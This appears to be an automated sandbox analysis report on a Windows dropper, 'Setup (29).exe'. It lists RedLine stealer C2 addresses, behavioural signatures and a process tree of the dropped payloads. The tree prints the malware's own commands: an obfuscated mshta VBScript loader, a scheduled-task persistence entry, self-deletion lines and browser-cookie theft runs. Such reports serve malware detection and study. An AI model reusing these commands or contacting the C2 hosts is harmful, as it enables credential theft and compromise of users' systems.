Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    369s
  • max time network
    1821s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-08-2021 20:54

General

  • Target

    Setup (29).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

supertraff

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 32 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 9 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 26 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 49 IoCs
  • Checks SCSI registry key(s) 3 TTPs 15 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 18 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Script User-Agent 27 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1332
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2696
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:2840
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:988
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2680
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2440
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2432
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1952
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1376
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1184
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1088
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    PID:1028
                    • C:\ProgramData\hkejgf\ultrsx.exe
                      C:\ProgramData\hkejgf\ultrsx.exe start
                      2⤵
                        PID:8032
                      • C:\ProgramData\hxnwhkf\abnrevr.exe
                        C:\ProgramData\hxnwhkf\abnrevr.exe start
                        2⤵
                          PID:7188
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          2⤵
                            PID:4728
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              3⤵
                                PID:8416
                                • C:\Windows\SysWOW64\schtasks.exe
                                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:500
                            • C:\Users\Admin\AppData\Roaming\euhffdw
                              C:\Users\Admin\AppData\Roaming\euhffdw
                              2⤵
                                PID:9972
                              • C:\Users\Admin\AppData\Roaming\juhffdw
                                C:\Users\Admin\AppData\Roaming\juhffdw
                                2⤵
                                  PID:8632
                                • C:\Users\Admin\AppData\Local\6cc88fe3-7366-4791-a99e-64be8deb1249\6A0C.exe
                                  C:\Users\Admin\AppData\Local\6cc88fe3-7366-4791-a99e-64be8deb1249\6A0C.exe --Task
                                  2⤵
                                    PID:4256
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    2⤵
                                      PID:9360
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        3⤵
                                          PID:10896
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        2⤵
                                          PID:10996
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                        1⤵
                                          PID:340
                                        • C:\Users\Admin\AppData\Local\Temp\Setup (29).exe
                                          "C:\Users\Admin\AppData\Local\Temp\Setup (29).exe"
                                          1⤵
                                          • Checks computer location settings
                                          • Modifies system certificate store
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of WriteProcessMemory
                                          PID:800
                                          • C:\Users\Admin\Documents\VL7DrLtV4kL4lptBOYHOfpSC.exe
                                            "C:\Users\Admin\Documents\VL7DrLtV4kL4lptBOYHOfpSC.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:3160
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "VL7DrLtV4kL4lptBOYHOfpSC.exe" /f & erase "C:\Users\Admin\Documents\VL7DrLtV4kL4lptBOYHOfpSC.exe" & exit
                                              3⤵
                                                PID:4300
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /im "VL7DrLtV4kL4lptBOYHOfpSC.exe" /f
                                                  4⤵
                                                  • Kills process with taskkill
                                                  PID:6884
                                            • C:\Users\Admin\Documents\i9_obFqdpnEVVupGvCMSYzW9.exe
                                              "C:\Users\Admin\Documents\i9_obFqdpnEVVupGvCMSYzW9.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Checks BIOS information in registry
                                              • Checks whether UAC is enabled
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3912
                                            • C:\Users\Admin\Documents\9CkD3yMgNWMVO6F4QMDq4fpC.exe
                                              "C:\Users\Admin\Documents\9CkD3yMgNWMVO6F4QMDq4fpC.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:3840
                                              • C:\Users\Admin\Documents\9CkD3yMgNWMVO6F4QMDq4fpC.exe
                                                "C:\Users\Admin\Documents\9CkD3yMgNWMVO6F4QMDq4fpC.exe" -q
                                                3⤵
                                                  PID:5112
                                              • C:\Users\Admin\Documents\69QLPY01vMRSV47fQfrTmLSA.exe
                                                "C:\Users\Admin\Documents\69QLPY01vMRSV47fQfrTmLSA.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:3976
                                                • C:\Users\Admin\Documents\69QLPY01vMRSV47fQfrTmLSA.exe
                                                  C:\Users\Admin\Documents\69QLPY01vMRSV47fQfrTmLSA.exe
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4552
                                              • C:\Users\Admin\Documents\DpmzNQlJMYndADrfOqMUNKBb.exe
                                                "C:\Users\Admin\Documents\DpmzNQlJMYndADrfOqMUNKBb.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:2892
                                              • C:\Users\Admin\Documents\gEbAOP201c0YmfBBHbjId0aw.exe
                                                "C:\Users\Admin\Documents\gEbAOP201c0YmfBBHbjId0aw.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2732
                                              • C:\Users\Admin\Documents\x9rFP0VWlnXajTpAWvqk8y_h.exe
                                                "C:\Users\Admin\Documents\x9rFP0VWlnXajTpAWvqk8y_h.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:3380
                                              • C:\Users\Admin\Documents\fCA9q5PDeUf9BNXi0gZHkc3Z.exe
                                                "C:\Users\Admin\Documents\fCA9q5PDeUf9BNXi0gZHkc3Z.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:60
                                                • C:\Users\Admin\Documents\fCA9q5PDeUf9BNXi0gZHkc3Z.exe
                                                  "C:\Users\Admin\Documents\fCA9q5PDeUf9BNXi0gZHkc3Z.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:5820
                                                • C:\Users\Admin\Documents\fCA9q5PDeUf9BNXi0gZHkc3Z.exe
                                                  "C:\Users\Admin\Documents\fCA9q5PDeUf9BNXi0gZHkc3Z.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:5732
                                                • C:\Users\Admin\Documents\fCA9q5PDeUf9BNXi0gZHkc3Z.exe
                                                  "C:\Users\Admin\Documents\fCA9q5PDeUf9BNXi0gZHkc3Z.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:5656
                                              • C:\Users\Admin\Documents\jkfCtKA9GfYOOo4fSVB61jst.exe
                                                "C:\Users\Admin\Documents\jkfCtKA9GfYOOo4fSVB61jst.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3732
                                              • C:\Users\Admin\Documents\nfe0joCtsFanp8k_ZbDYQovc.exe
                                                "C:\Users\Admin\Documents\nfe0joCtsFanp8k_ZbDYQovc.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2884
                                              • C:\Users\Admin\Documents\mLtDGptvMBT2ZyEoEIrxfVrw.exe
                                                "C:\Users\Admin\Documents\mLtDGptvMBT2ZyEoEIrxfVrw.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:3940
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 760
                                                  3⤵
                                                  • Program crash
                                                  PID:5660
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 816
                                                  3⤵
                                                  • Program crash
                                                  PID:4544
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 800
                                                  3⤵
                                                  • Program crash
                                                  PID:4788
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 828
                                                  3⤵
                                                  • Program crash
                                                  PID:4388
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 956
                                                  3⤵
                                                  • Program crash
                                                  PID:6768
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 1000
                                                  3⤵
                                                  • Program crash
                                                  PID:6024
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 1016
                                                  3⤵
                                                  • Program crash
                                                  PID:4384
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 1372
                                                  3⤵
                                                  • Program crash
                                                  PID:6384
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 1404
                                                  3⤵
                                                  • Program crash
                                                  PID:6888
                                              • C:\Users\Admin\Documents\6KVjl3lodolGaFxH0f1jBFf8.exe
                                                "C:\Users\Admin\Documents\6KVjl3lodolGaFxH0f1jBFf8.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:3744
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\6KVjl3lodolGaFxH0f1jBFf8.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\6KVjl3lodolGaFxH0f1jBFf8.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                  3⤵
                                                    PID:4480
                                                • C:\Users\Admin\Documents\Ku0CaEKKYWeNxOAILzbsZ7cV.exe
                                                  "C:\Users\Admin\Documents\Ku0CaEKKYWeNxOAILzbsZ7cV.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:3236
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4420516112.exe"
                                                    3⤵
                                                      PID:5248
                                                      • C:\Users\Admin\AppData\Local\Temp\4420516112.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\4420516112.exe"
                                                        4⤵
                                                        • Drops file in Windows directory
                                                        PID:4744
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9950917150.exe"
                                                      3⤵
                                                      • Loads dropped DLL
                                                      PID:5760
                                                      • C:\Users\Admin\AppData\Local\Temp\9950917150.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\9950917150.exe"
                                                        4⤵
                                                          PID:7660
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7660 -s 824
                                                            5⤵
                                                            • Program crash
                                                            PID:6524
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7660 -s 900
                                                            5⤵
                                                            • Program crash
                                                            PID:9116
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7660 -s 828
                                                            5⤵
                                                            • Program crash
                                                            PID:8256
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "Ku0CaEKKYWeNxOAILzbsZ7cV.exe" /f & erase "C:\Users\Admin\Documents\Ku0CaEKKYWeNxOAILzbsZ7cV.exe" & exit
                                                        3⤵
                                                          PID:8152
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /im "Ku0CaEKKYWeNxOAILzbsZ7cV.exe" /f
                                                            4⤵
                                                            • Kills process with taskkill
                                                            PID:1540
                                                      • C:\Users\Admin\Documents\mgWY5VBIXrdnouCe39OC3Fum.exe
                                                        "C:\Users\Admin\Documents\mgWY5VBIXrdnouCe39OC3Fum.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:2616
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 388
                                                          3⤵
                                                          • Program crash
                                                          PID:4044
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 400
                                                          3⤵
                                                          • Program crash
                                                          PID:5348
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 428
                                                          3⤵
                                                          • Program crash
                                                          PID:5300
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 624
                                                          3⤵
                                                          • Program crash
                                                          PID:6520
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 632
                                                          3⤵
                                                          • Program crash
                                                          PID:6004
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 692
                                                          3⤵
                                                          • Program crash
                                                          PID:6256
                                                      • C:\Users\Admin\Documents\bv9fVfIwj0pBl1pnolmAmcy_.exe
                                                        "C:\Users\Admin\Documents\bv9fVfIwj0pBl1pnolmAmcy_.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:3864
                                                        • C:\Users\Admin\Documents\bv9fVfIwj0pBl1pnolmAmcy_.exe
                                                          "C:\Users\Admin\Documents\bv9fVfIwj0pBl1pnolmAmcy_.exe"
                                                          3⤵
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:4748
                                                      • C:\Users\Admin\Documents\phtnXwOjayPq0e53wPUdbPGi.exe
                                                        "C:\Users\Admin\Documents\phtnXwOjayPq0e53wPUdbPGi.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:3592
                                                        • C:\Users\Admin\Documents\phtnXwOjayPq0e53wPUdbPGi.exe
                                                          C:\Users\Admin\Documents\phtnXwOjayPq0e53wPUdbPGi.exe
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2036
                                                      • C:\Users\Admin\Documents\_9S77jOi0ujEOVdJtScVAzlF.exe
                                                        "C:\Users\Admin\Documents\_9S77jOi0ujEOVdJtScVAzlF.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3808
                                                        • C:\Users\Admin\AppData\Roaming\2327000.exe
                                                          "C:\Users\Admin\AppData\Roaming\2327000.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3832
                                                        • C:\Users\Admin\AppData\Roaming\5538156.exe
                                                          "C:\Users\Admin\AppData\Roaming\5538156.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          PID:3260
                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:4560
                                                        • C:\Users\Admin\AppData\Roaming\4788309.exe
                                                          "C:\Users\Admin\AppData\Roaming\4788309.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5060
                                                        • C:\Users\Admin\AppData\Roaming\2031231.exe
                                                          "C:\Users\Admin\AppData\Roaming\2031231.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3452
                                                      • C:\Users\Admin\Documents\Yrae6BPk3G7_oUQBuiZYNrRO.exe
                                                        "C:\Users\Admin\Documents\Yrae6BPk3G7_oUQBuiZYNrRO.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:3756
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 480
                                                          3⤵
                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                          • Program crash
                                                          PID:1272
                                                      • C:\Users\Admin\Documents\IkCLuFvpPPXpNB1u5pYuVCVg.exe
                                                        "C:\Users\Admin\Documents\IkCLuFvpPPXpNB1u5pYuVCVg.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:904
                                                      • C:\Users\Admin\Documents\csJm506rzxtDpNpggd5yJ0Li.exe
                                                        "C:\Users\Admin\Documents\csJm506rzxtDpNpggd5yJ0Li.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:2092
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 664
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1204
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 676
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4700
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 684
                                                          3⤵
                                                          • Program crash
                                                          PID:3500
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 804
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3300
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1060
                                                          3⤵
                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5572
                                                      • C:\Users\Admin\Documents\jBc_Tr0GnmbVBbrDTfExgbtq.exe
                                                        "C:\Users\Admin\Documents\jBc_Tr0GnmbVBbrDTfExgbtq.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        PID:1816
                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Drops startup file
                                                          PID:4688
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:3920
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:3524
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                              PID:2308
                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                              4⤵
                                                                PID:5140
                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:5600
                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:5976
                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                4⤵
                                                                  PID:4320
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                  4⤵
                                                                    PID:5904
                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:4780
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:4596
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    4⤵
                                                                      PID:5180
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      4⤵
                                                                        PID:10604
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        4⤵
                                                                          PID:10464
                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
